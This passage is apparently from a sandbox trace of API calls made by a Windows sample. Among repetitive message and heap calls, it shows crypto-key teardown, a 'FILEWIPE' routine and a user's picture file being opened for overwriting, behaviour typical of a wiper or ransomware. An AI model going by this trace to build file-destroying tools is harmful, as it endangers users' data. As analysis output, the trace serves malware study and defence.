hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0189.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.496] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.497] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.497] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.497] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0189.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.497] CryptDestroyKey (hKey=0x90af98) returned 1 [0189.497] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.497] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.497] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.498] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.498] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.498] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.498] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.498] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.498] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.498] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0189.498] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0189.498] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.498] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.498] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.498] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.498] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.499] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.499] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.499] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.499] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.499] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.499] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.499] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.499] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.500] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.500] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.500] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0189.500] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.500] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.500] FreeLibrary (hLibModule=0x74f20000) returned 1 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0189.500] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0189.500] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.500] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.502] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.503] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.503] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0189.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0189.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.503] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.503] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.503] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0xb6ccdc90, ftLastWriteTime.dwHighDateTime=0x1d5e322, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 0x90ae18 [0189.503] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0189.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.504] CharLowerBuffW (in: lpsz="byte[30692]", cchLength=0xb | out: lpsz="byte[30692]") returned 0xb [0189.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.504] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0189.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.504] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.504] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0189.504] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0189.505] FreeLibrary (hLibModule=0x75c90000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.506] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.533] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.533] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0189.533] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\lu ye0otm8f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0189.534] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.535] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.535] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0189.535] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.535] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.536] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.536] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.536] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0189.536] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.536] 